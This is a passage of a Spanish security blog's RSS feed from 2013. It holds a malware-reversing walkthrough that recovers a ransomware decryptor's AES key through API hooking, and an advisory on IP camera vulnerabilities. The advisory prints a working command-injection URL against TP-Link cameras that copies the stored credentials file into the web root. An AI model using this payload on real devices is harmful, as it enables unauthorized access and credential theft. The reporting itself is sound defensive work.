/&gt;&lt;div style="text-align: right;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Juan Garrido&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: right;"&gt;&lt;br /&gt;MVP Enterprise Security&lt;br /&gt;&lt;br /&gt;&lt;a href="https://twitter.com/tr1ana"&gt;@tr1ana&lt;/a&gt; &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;Referencias:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/ee330735(v=vs.85).aspx"&gt;http://msdn.microsoft.com/en-us/library/ee330735(v=vs.85).aspx&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://technet.microsoft.com/en-us/library/ee619754(v=ws.10).aspx"&gt;http://technet.microsoft.com/en-us/library/ee619754(v=ws.10).aspx&lt;/a&gt; &lt;/div&gt;&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/90kyNvjCoPo" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/habilitar-aviso-de-certificado-no.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://3.bp.blogspot.com/-rDMJfsP8OTE/UaecK-XVfrI/AAAAAAAAADY/y6DVJ5eN4jY/s72-c/ie.png" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-4023347291955521884</guid><pubDate>Thu, 20 Jun 2013 15:23:00 +0000</pubDate><atom:updated>2013-06-20T10:23:09.804-05:00</atom:updated><title>Reversing malware tales: Crypto-Reversing</title><description>&lt;a href="http://feedproxy.google.com/~r/SecurityByDefault/~3/p8BBqU80i48/reversing-malware-tales-crypto-reversing.html"&gt;Reversing malware tales: Crypto-Reversing&lt;/a&gt;: &lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-30xAfINDgDE/T8ZK8nEnYqI/AAAAAAAABZQ/08BuW6T-QFc/s200/Malware.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="187" src="http://3.bp.blogspot.com/-30xAfINDgDE/T8ZK8nEnYqI/AAAAAAAABZQ/08BuW6T-QFc/s200/Malware.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;En el capítulo anterior dejábamos el asunto en que los 'amables' secuestradores nos habían entregado una herramienta para descifrar los ficheros del rescate.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Hoy vamos a averiguar exactamente que es lo que hace esa herramienta, nuestro objetivo es averiguar todos los parámetros del cifrado (la clave, el algoritmo ...)&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;El programa es de muy fácil empleo y tiene una interface gráfica simple pero intuitiva&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-AZ-JCLgDRvY/Uaqog7x3Y8I/AAAAAAAAB98/m4w48eeaNEs/s1600/main.JPG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="118" src="http://4.bp.blogspot.com/-AZ-JCLgDRvY/Uaqog7x3Y8I/AAAAAAAAB98/m4w48eeaNEs/s200/main.JPG" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Antes que nada, y dado que el fichero es detectado como un troyano por muchos AVs, vamos a ver que opina &lt;a href="http://bsa.isoftware.nl/"&gt;BSA&lt;/a&gt; al respecto, solo nos detendremos brevemente, ahora el objetivo es otro, ya habrá tiempo de analizar las maldades.&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-nVz-44jp1T0/UaqhjjYsK0I/AAAAAAAAB9A/YSFMpQN1260/s1600/bsa.JPG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="239" src="http://3.bp.blogspot.com/-nVz-44jp1T0/UaqhjjYsK0I/AAAAAAAAB9A/YSFMpQN1260/s320/bsa.JPG" width="320" /&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: justify;"&gt;&lt;br /&gt;Como se puede ver, BSA detecta cierta actividad digna de sospechar.&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: justify;"&gt;&lt;br /&gt;Vayamos hacia la parte criptográfica del asunto. En primer lugar vamos a usar OllyDbg para ver que funciones emplea para realizar el descifrado, con suerte puede que sea algo fácil de seguir.&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-Si-zN_RknZ4/UaqkcwCYqKI/AAAAAAAAB9Q/MkuAU7jeZHY/s1600/olly2.JPG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="60" src="http://2.bp.blogspot.com/-Si-zN_RknZ4/UaqkcwCYqKI/AAAAAAAAB9Q/MkuAU7jeZHY/s400/olly2.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: left;"&gt;&lt;br /&gt;&amp;nbsp; &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;¿Dije suerte? ¡ Con la CryptoAPI hemos topado ! Bienvenidos a un mundo de múltiples funciones y tipos de datos bastante esotéricos &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;En primer lugar, la función candidata a prestarle más atención es &lt;a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa380207(v=vs.85).aspx"&gt;CryptImportKey&lt;/a&gt; como podemos ver en MSDN esta función hay que llamarla así:&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-AMm_m3ax8fs/UaqmMUBbhgI/AAAAAAAAB9g/Muod-FIFhLA/s1600/importkey.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="158" src="http://1.bp.blogspot.com/-AMm_m3ax8fs/UaqmMUBbhgI/AAAAAAAAB9g/Muod-FIFhLA/s200/importkey.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;A efectos de este análisis nos interesa -mucho- el campo *pbData ya que es lo que va a contener la clave y detalles como el algoritmo en cuestión.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Ese parámetro contendrá un 'BLOBHEADER' y el BLOB propiamente dicho. (un BLOB es, groso modo, un array de datos) &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;No obstante, vemos que ese BLOB puede ser &lt;a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa387453(v=vs.85).aspx"&gt;de varios tipos&lt;/a&gt;, y algunos de ellos van cifrados, ahí entra en liza el parámetro hPubKey. Así que lo primero que nos interesa es ver como llama el programa a la función CryptImportKey, para eso vamos a usar &lt;a href="http://www.rohitab.com/apimonitor"&gt;API-MONITOR&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-48iMS7WRJVw/UaqnqsNWFXI/AAAAAAAAB9w/6ePmDcYLFTg/s1600/api2.JPG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="125" src="http://1.bp.blogspot.com/-48iMS7WRJVw/UaqnqsNWFXI/AAAAAAAAB9w/6ePmDcYLFTg/s400/api2.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Vemos que el parámetro no se usa (0x00000000) así que nos hemos quitado de golpe una complicación.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;El segundo punto es averiguar el tipo de BLOB que le está pasando el programa a la función para poder parsearlo y extraer la información que nos interesa.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;En este punto hay varios caminos a seguir, compartí el binario con &lt;a href="https://twitter.com/a0rtega"&gt;Alberto Ortega&lt;/a&gt; y el encontró un camino diferente. Voy a explicar como lo hice yo (y si el se anima a explicar su método, le dejamos las puertas abiertas)&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Para acceder a los datos de la función el camino que yo elegí fue usar API-hooking y forzar al programa a que llame a 'mi' CryptImportKey en vez de la oficial. De esa forma me enviaría a mi los datos y podría verlos en tiempo de ejecución.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Para esta labor, encontré MUY útil la herramienta &lt;a href="http://jacquelin.potier.free.fr/winapioverride32/"&gt;WinAPIOverride&lt;/a&gt;, esta herramienta tiene una funcionalidad parecida a API-Monitor, pero además permite inyectar una dll en el proceso y sobre-escribir (override) cualquier función. Viene con un SDK que se integra en Visual Studio y ejemplos para hacer tu propia DLL.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Vamos a re-escribir la función CryptImportKey() haciendo que acepte el BLOBHEADER y el BLOB, abra un fichero y ponga en el la información de ese BLOB. El primer paso es analizar el BLOBHEADER&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Tomando como referencia la estructura &lt;a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa387453(v=vs.85).aspx"&gt;de un BLOBHEADER&lt;/a&gt; &lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-qvu1W7hjUAY/UaqsZdFyIdI/AAAAAAAAB-M/ryM7sAwv0xc/s1600/blob.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="157" src="http://3.bp.blogspot.com/-qvu1W7hjUAY/UaqsZdFyIdI/AAAAAAAAB-M/ryM7sAwv0xc/s320/blob.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Nos interesa bType (para saber el tipo de BLOB que está usando el programa) y aiKeyAlg para saber que algoritmo está usando&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;La nueva función CryptImportKey queda así:&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-ZH1n8Sk58cI/UaqtC3fNq4I/AAAAAAAAB-U/rbhkelxLgW8/s1600/cryptimportkey1.JPG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="211" src="http://3.bp.blogspot.com/-ZH1n8Sk58cI/UaqtC3fNq4I/AAAAAAAAB-U/rbhkelxLgW8/s640/cryptimportkey1.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Si todo va bien, cuando el programa llame a CryptImportKey, será redirigido a mCryptImportKey y esta función recibirá los datos, los analizará y volcara en el fichero dump.txt los datos del BLOB&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Ejecutamos el binario desde WinAPIOverride con nuestra DLL:&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-OpxljIRp-bY/Uaq1KVWXLuI/AAAAAAAAB-k/tjAv3rENpK8/s1600/override.JPG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="213" src="http://3.bp.blogspot.com/-OpxljIRp-bY/Uaq1KVWXLuI/AAAAAAAAB-k/tjAv3rENpK8/s400/override.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Y vemos que se crea el fichero dump.txt con los siguientes datos:&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Tipo de blob 0x08&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Version 0x02&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Algoritmo 0x00006610&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Primera fase completada:&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Tipo de Blob: &lt;a href="http://msdn.microsoft.com/en-us/library/windows/desktop/jj650836(v=vs.85).aspx"&gt;PLAINTEXTKEYBLOB&lt;/a&gt; (0x08)&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Algoritmo: AES (0x00006610)&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Ahora que ya sabemos el tipo de BLOB que es y conocemos su estructura:&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-A2p_shWI4DA/Uaq2aZ36odI/AAAAAAAAB-4/-Qu5rl3twz8/s1600/plainblob.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="142" src="http://1.bp.blogspot.com/-A2p_shWI4DA/Uaq2aZ36odI/AAAAAAAAB-4/-Qu5rl3twz8/s320/plainblob.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;podemos analizarlo y obtener la clave. Para ello modificamos nuestra función mCryptImportKey de la siguiente forma:&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-Ubzvh262mk8/Uaq2Dq-5UGI/AAAAAAAAB-w/Zkq4cvU_BnI/s1600/cryptimportkey2.JPG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="316" src="http://4.bp.blogspot.com/-Ubzvh262mk8/Uaq2Dq-5UGI/AAAAAAAAB-w/Zkq4cvU_BnI/s640/cryptimportkey2.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Y con eso, haremos que vuelque en el fichero la longitud de la clave y la propia clave. Ejecutamos desde WinAPIOverride y obtenemos en dump.txt:&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Tipo de blob 0x08&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Version 0x02&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Algoritmo 0x00006610&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;longitud de la clave 32&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Datos de la clave (censurado)&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Perfecto, ya sabemos el algoritmo &lt;b&gt;AES&lt;/b&gt;, la longitud de la clave &lt;b&gt;32&lt;/b&gt; bytes (que equivale a AES-256 bits) y la propia clave, solo nos queda saber el 'cipher mode' es decir, si está empleando CBC, ECB, CFB ...&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Para averiguarlo, volvemos a la captura de Olly y en este caso nos interesa la función &lt;a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa380272(v=vs.85).aspx"&gt;CryptSetKeyParam&lt;/a&gt; que es donde se determina la forma en la que se va a cifrar&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-FU5EzeBAF2Q/Uaq5GLk5IKI/AAAAAAAAB_I/8a3grULsIZQ/s1600/setkey.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="170" src="http://4.bp.blogspot.com/-FU5EzeBAF2Q/Uaq5GLk5IKI/AAAAAAAAB_I/8a3grULsIZQ/s320/setkey.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;De MSDN, nos quedamos con el parámetro KP_MODE del que podemos leer:&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-WTNs9RdI8r0/Uaq5jAEn31I/AAAAAAAAB_Q/7NMhnUaMWAU/s1600/kp.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="100" src="http://4.bp.blogspot.com/-WTNs9RdI8r0/Uaq5jAEn31I/AAAAAAAAB_Q/7NMhnUaMWAU/s640/kp.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Y si vemos como se llama esta función desde API-Monitor:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-X7cDJQke0f8/Uaq5urhIBLI/AAAAAAAAB_Y/dMNy_ey-6bY/s1600/api3.JPG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="115" src="http://1.bp.blogspot.com/-X7cDJQke0f8/Uaq5urhIBLI/AAAAAAAAB_Y/dMNy_ey-6bY/s400/api3.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Vemos que identifica el KP_MODE como 0x02 que, define &lt;a href="https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_.28ECB.29"&gt;el modo ECB&lt;/a&gt; como 'cipher mode'&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Y con esto, concluye el análisis criptográfico del programa, hemos averiguado el tipo de algoritmo, la longitud de su clave, el método del cifrado y la propia clave en sí&lt;/div&gt;&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/p8BBqU80i48" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/reversing-malware-tales-crypto-reversing.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://3.bp.blogspot.com/-30xAfINDgDE/T8ZK8nEnYqI/AAAAAAAABZQ/08BuW6T-QFc/s72-c/Malware.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-3495819379822017763</guid><pubDate>Thu, 20 Jun 2013 15:23:00 +0000</pubDate><atom:updated>2013-06-20T10:23:05.249-05:00</atom:updated><title>Múltiples vulnerabilidades en diferentes cámaras IP (TP-Link, MayGion y Zavio)</title><description>&lt;a href="http://feedproxy.google.com/~r/hispasec/zCAd/~3/hdag0zlJOzI/multiples-vulnerabilidades-en.html"&gt;Múltiples vulnerabilidades en diferentes cámaras IP (TP-Link, MayGion y Zavio)&lt;/a&gt;: &lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;span style="font-size: 13.0pt;"&gt;Nahuel Riva y Francisco Falcon de Core Exploit han descubierto y publicado &lt;b&gt;múltiples vulnerabilidades en cámaras IP&lt;/b&gt; de los fabricantes TP-Link, MayGion y Zavio. También han desarrollado diversas pruebas de concepto para demostrar estos fallos de seguridad.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Las vulnerabilidades que &lt;a href="http://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities"&gt;afectan a las cámaras IP TP-Link&lt;/a&gt; son:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2572"&gt;CVE-2013-2572&lt;/a&gt;: un atacante remoto podría utilizar los credenciales fijados en el fichero de configuración '&lt;i&gt;boa.conf&lt;/i&gt;' para acceder a la interfaz web de administración.&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2573"&gt;CVE-2013-2573&lt;/a&gt;: un error de falta de filtrado de parámetros de entrada en '&lt;i&gt;/cgi-bin/mft/wireless_mft.cgi&lt;/i&gt;' podría permitir la inyección de comandos de forma remota.&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Como prueba de concepto, se inyecta un comando en la siguiente URL para alojar una copia del fichero que almacena los credenciales de los usuarios en el directorio raíz del servidor web, aprovechando la vulnerabilidad &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2573"&gt;CVE-2013-2573&lt;/a&gt;:&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://xn--direccin_ip-web/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales"&gt;http://DIRECCIÓN_IP/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;table cellpadding="0" cellspacing="0" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-BMzw9u7VhXM/UaiL5n3DpaI/AAAAAAAACk4/4J6oqQqdGAw/s1600/TP-Link_TL-SC3130G-01.jpg" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-BMzw9u7VhXM/UaiL5n3DpaI/AAAAAAAACk4/4J6oqQqdGAw/s1600/TP-Link_TL-SC3130G-01.jpg" width="126" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;TP-Link TL-SC 3130G&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;quedando accesible desde la URL: &lt;a href="http://xn--direccin_ip-web/credenciales"&gt;http://DIRECCIÓN_IP/credenciales&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Se ven afectados los dispositivos con firmware v1.6.18P12, y se han comprobado los modelos: &lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt;TL-SC 3130 (solo la vulnerabilidad CVE-2013-2572 afecta a este dispositivo)&lt;/li&gt;&lt;br /&gt;&lt;li&gt;TL-SC 3130G&lt;/li&gt;&lt;br /&gt;&lt;li&gt;TL-SC 3171G&lt;/li&gt;&lt;br /&gt;&lt;li&gt;TL-SC 4171G&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;b&gt;TP-Link ha publicado una actualización&lt;/b&gt; de firmware que corrige los errores en su página web.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Por su parte &lt;a href="http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities"&gt;las cámaras IP del fabricante MayGion&lt;/a&gt; presentan otras dos vulnerabilidades:&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1604"&gt;CVE-2013-1604&lt;/a&gt;: un atacante remoto no autenticado podría aprovechar un problema de ruta transversal para realizar un volcado de la memoria del dispositivo y obtener 